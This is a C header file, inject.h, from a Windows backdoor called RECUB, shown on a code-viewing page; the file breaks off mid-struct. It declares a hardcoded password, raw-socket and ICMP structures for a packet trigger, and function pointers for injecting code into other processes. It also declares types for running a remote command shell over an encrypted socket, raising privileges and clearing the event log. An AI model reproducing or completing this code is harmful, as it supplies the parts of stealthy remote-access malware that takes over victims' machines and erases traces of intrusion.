📄 inject.h
字号:
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// //
// RECUB //
// By Hirosh //
// www.hirosh.net //
// www.eos-india.net //
// //
//Thanks for starch at http://mir-os.sourceforge.net For the idea,I started this by //
//porting his version in linux to win32,after some time i stoped porting bc i prefer //
//a small EXE heheh..,and thanks to NC source too.. //
// //
// No CopyRights - Feel Free to Cut & Paste //
// //
// //
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
#include <winsock2.h>
#define _WIN32_WINNT 0x0510
#include <wincrypt.h>
#define SERVER_PASS "123"
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
typedef struct tagXData
{
char start;
char pass[4];
char ip[16];
unsigned int port;
char end;
} XData;
typedef struct ip_hdr
{
unsigned char ip_verlen;
unsigned char ip_tos;
unsigned short ip_totallength;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_ttl;
unsigned char ip_protocol;
unsigned short ip_checksum;
unsigned int ip_srcaddr;
unsigned int ip_destaddr;
} IP_HDR;
#define REQ_DATASIZE 32
typedef struct tagICMPHDR
{
unsigned char icmp_type;
unsigned char icmp_code;
unsigned short icmp_cksum;
unsigned short icmp_id;
unsigned short icmp_seq;
} ICMPHDR, *PICMPHDR;
typedef struct tagECHOREQUEST
{
ICMPHDR icmpHdr;
char cData[REQ_DATASIZE];
} ECHOREQUEST, *PECHOREQUEST;
//typedef HANDLE (WINAPI *tCreateFile)( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
//typedef BOOL (WINAPI *tWriteFile)( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped );
//typedef DWORD (WINAPI *tSetFilePointer) ( HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod );
typedef char FAR * (WINAPI *tinet_ntoa) ( struct in_addr in );
//typedef int (WINAPI *tMBox)(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
typedef int (WINAPI *tWSAStartup)( WORD wVersionRequested, LPWSADATA lpWSAData );
typedef int (WINAPI *tsocket)( int , int type, int protocol );
typedef int (WINAPI *tbind)( int , const struct sockaddr FAR *name, int namelen);
typedef int (WINAPI *tlisten)( int , int backlog);
typedef int (WINAPI *taccept)( int ,struct sockaddr FAR *addr,int FAR *addrlen);
typedef int (WINAPI *tclosesocket)(int);
typedef int (WINAPI *tWSAIoctl)(SOCKET s,DWORD dwIoControlCode,LPVOID lpvInBuffer,DWORD cbInBuffer,LPVOID lpvOutBuffer,DWORD cbOutBuffer,LPDWORD lpcbBytesReturned,LPWSAOVERLAPPED lpOverlapped,LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);
typedef int (WINAPI *trecv)(SOCKET s,char FAR *buf,int len, int flags);
typedef struct hostent FAR *(WINAPI *tgethostbyname)( const char FAR *name);
typedef int (WINAPI *tconnect)(SOCKET s,const struct sockaddr FAR *name,int namelen);
typedef u_short (WINAPI *thtons)(u_short hostshort);
typedef int (WINAPI *tsend)( SOCKET s, const char FAR *buf, int len, int flags);
typedef unsigned long (WINAPI *tinet_addr)( const char FAR *cp);
//typedef VOID (WINAPI *tZeroMemory)(PVOID Destination,SIZE_T Length);
typedef HANDLE (WINAPI *tCreateThread)( LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
typedef VOID (WINAPI *tSleep)( DWORD dwMilliseconds);
typedef HANDLE (WINAPI *tCreateRemoteThread)(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
typedef BOOL (WINAPI *tWriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten);
typedef LPVOID (WINAPI *tVirtualAllocEx)( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
typedef HANDLE (WINAPI *tOpenProcess)( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
typedef HMODULE (WINAPI *tLoadLibrary)( LPCTSTR lpFileName );
typedef FARPROC (WINAPI *tGetProcAddress)( HMODULE hModule,LPCSTR lpProcName);
typedef BOOL (WINAPI *tFreeLibrary)( HMODULE hModule);
//DoExec
typedef BOOL (WINAPI *tCreatePipe)( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize );
typedef BOOL (WINAPI *tDuplicateHandle)( HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
typedef BOOL (WINAPI *tCreateProcess)(LPCTSTR lpApplicationName,LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,LPCTSTR lpCurrentDirectory,LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
typedef DWORD (WINAPI *tWaitForMultipleObjects)( DWORD nCount,CONST HANDLE *lpHandles,BOOL fWaitAll, DWORD dwMilliseconds);
typedef BOOL (WINAPI *tCloseHandle)( HANDLE hObject);
typedef BOOL (WINAPI *tTerminateThread)(HANDLE hThread,DWORD dwExitCode);
typedef BOOL (WINAPI *tTerminateProcess)(HANDLE hProcess,UINT uExitCode);
typedef BOOL (WINAPI *tDisconnectNamedPipe)(HANDLE hNamedPipe);
typedef BOOL (WINAPI *tPeekNamedPipe)(HANDLE hNamedPipe,LPVOID lpBuffer,DWORD nBufferSize,LPDWORD lpBytesRead,LPDWORD lpTotalBytesAvail,LPDWORD lpBytesLeftThisMessage);
typedef BOOL (WINAPI *tReadFile)( HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
typedef VOID (WINAPI *tExitThread)( DWORD dwExitCode);
typedef LPTSTR (WINAPI *tlstrcpy)( LPTSTR lpString1,LPCTSTR lpString2);
//typedef int (WINAPI *tlstrcmpi)(LPCTSTR lpString1, LPCTSTR lpString2);
typedef int (WINAPI *tlstrlen)(LPCTSTR lpString);
typedef int (WINAPI *tlstrcmp)( LPCTSTR lpString1, LPCTSTR lpString2 );
typedef BOOL (WINAPI *tWriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
typedef HANDLE (WINAPI *tGetCurrentProcess)(VOID);
//typedef VOID (WINAPI *tPostQuitMessage)( int nExitCode );
//typedef DWORD (WINAPI *tFormatMessage)( DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPTSTR lpBuffer, DWORD nSize, va_list *Arguments );
//typedef DWORD (WINAPI *tGetLastError)(VOID);
//Crypt
typedef BOOL (WINAPI *tCryptAcquireContext)( HCRYPTPROV *phProv, LPCTSTR pszContainer, LPCTSTR pszProvider, DWORD dwProvType, DWORD dwFlags);
typedef BOOL (WINAPI *tCryptCreateHash)( HCRYPTPROV hProv, ALG_ID Algid,HCRYPTKEY hKey,DWORD dwFlags,HCRYPTHASH *phHash);
typedef BOOL (WINAPI *tCryptHashData)( HCRYPTHASH hHash, BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
typedef BOOL (WINAPI *tCryptDeriveKey)( HCRYPTPROV hProv, ALG_ID Algid, HCRYPTHASH hBaseData, DWORD dwFlags, HCRYPTKEY *phKey);
typedef BOOL (WINAPI *tCryptDecrypt)( HCRYPTKEY hKey, HCRYPTHASH hHash,BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
typedef BOOL (WINAPI *tCryptDestroyKey)( HCRYPTKEY hKey);
typedef BOOL (WINAPI *tCryptDestroyHash)( HCRYPTHASH hHash);
typedef BOOL (WINAPI *tCryptReleaseContext)( HCRYPTPROV hProv, DWORD dwFlags);
typedef BOOL (WINAPI *tCryptEncrypt)( HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen, DWORD dwBufLen);
typedef BOOL (WINAPI *tOpenProcessToken)( HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
typedef BOOL (WINAPI *tLookupPrivilegeValue)( LPCTSTR lpSystemName, LPCTSTR lpName, PLUID lpLuid);
typedef BOOL (WINAPI *tAdjustTokenPrivileges)( HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
typedef HANDLE (WINAPI *tRegisterEventSource)( LPCTSTR lpUNCServerName, LPCTSTR lpSourceName );
typedef BOOL (WINAPI *tClearEventLog)( HANDLE hEventLog,LPCTSTR lpBackupFileName);
typedef BOOL (WINAPI *tDeregisterEventSource)( HANDLE hEventLog);
typedef VOID (WINAPI *tExitProcess)( UINT uExitCode );
typedef struct TSESSION_DATA{
HANDLE ReadPipeHandle;
HANDLE WritePipeHandle;
HANDLE ProcessHandle;
SOCKET ClientSocket;
HANDLE ReadShellThreadHandle;
HANDLE WriteShellThreadHandle;
} SESSION_DATA;
typedef struct TWriteShellTParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
// tMBox pMBox;
// tlstrcmpi plstrcmpi;
tExitThread pExitThread;
tWriteFile pWriteFile;
trecv precv;
HMODULE hk32,hwinsock;
// HMODULE husr32;
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szrecv[5];
char szWriteFile[10];
char szExitThread[11];
// char szlstrcmpi[9];
BOOL Encrypt;
// Decr
HMODULE hAdvapi;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
char szLocalPassword[100];
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptDecrypt pCryptDecrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tCloseHandle pCloseHandle;
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptDecrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
//Decr End
//data
SESSION_DATA *Session;
BYTE Buff[100];
DWORD BytesWritten;
DWORD RcvCnt;
}WriteShellTParam;
typedef struct TReadShellTParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
// tMBox pMBox;
tPeekNamedPipe pPeekNamedPipe;
tReadFile pReadFile;
tSleep pSleep;
tsend psend;
tExitThread pExitThread;
HMODULE hk32,hwinsock;
// HMODULE husr32;
// char szuser32dll[11];
char szWs232[11];
char szkernel32dll[13];
// char szMessageBoxA[12];
char szPeekNamedPipe[14];
char szSleep[6];
char szReadFile[9];
char szExitThread[11];
char szsend[5];
// Decr
BOOL Encrypt;
HMODULE hAdvapi;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTKEY hXchgKey;
HCRYPTHASH hHash;
DWORD dwLength;
char szLocalPassword[100];
char CSP[50];
tCryptAcquireContext pCryptAcquireContext;
tCryptCreateHash pCryptCreateHash;
tCryptHashData pCryptHashData;
tCryptDeriveKey pCryptDeriveKey;
tCryptEncrypt pCryptEncrypt;
tCryptDestroyKey pCryptDestroyKey;
tCryptDestroyHash pCryptDestroyHash;
tCryptReleaseContext pCryptReleaseContext;
tlstrlen plstrlen;
tCloseHandle pCloseHandle;
char szAdvapi32[13];
char szlstrlen[9];
char szCryptAcquireContext[21];
char szCryptCreateHash[16];
char szCryptHashData[14];
char szCryptDeriveKey[15];
char szCryptEncrypt[13];
char szCryptDestroyKey[16];
char szCryptDestroyHash[17];
char szCryptReleaseContext[20];
//Decr End
//data
SESSION_DATA *Session;
BYTE Buff[1000];
DWORD BytesRead;
} ReadShellTParam;
typedef DWORD (WINAPI *tISessionWriteShellThread)(WriteShellTParam *sp);
typedef DWORD (WINAPI *tISessionReadShellThread)(ReadShellTParam *sp);
typedef struct TConnectParam
{
tLoadLibrary pLoadLibrary;
tGetProcAddress pGetProcAddress;
tFreeLibrary pFreeLibrary;
tCreateThread pCreateThread;
// tMBox pMBox;
tWSAStartup pWSAStartup;
tsocket psocket;
tgethostbyname pgethostbyname;
tconnect pconnect;
thtons phtons;
tinet_addr pinet_addr;
//for cmd
tCreatePipe pCreatePipe;
tDuplicateHandle pDuplicateHandle;
tGetCurrentProcess pGetCurrentProcess;
tCreateProcess pCreateProcess;
tCloseHandle pCloseHandle;
tclosesocket pclosesocket;
tDisconnectNamedPipe pDisconnectNamedPipe;
tWaitForMultipleObjects pWaitForMultipleObjects;
tTerminateThread pTerminateThread;
tTerminateProcess pTerminateProcess;
tISessionWriteShellThread pISessionWriteShellThread;
tISessionReadShellThread pISessionReadShellThread;
// tPostQuitMessage pPostQuitMessage;
tRegisterEventSource pRegisterEventSource;
tClearEventLog pClearEventLog;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -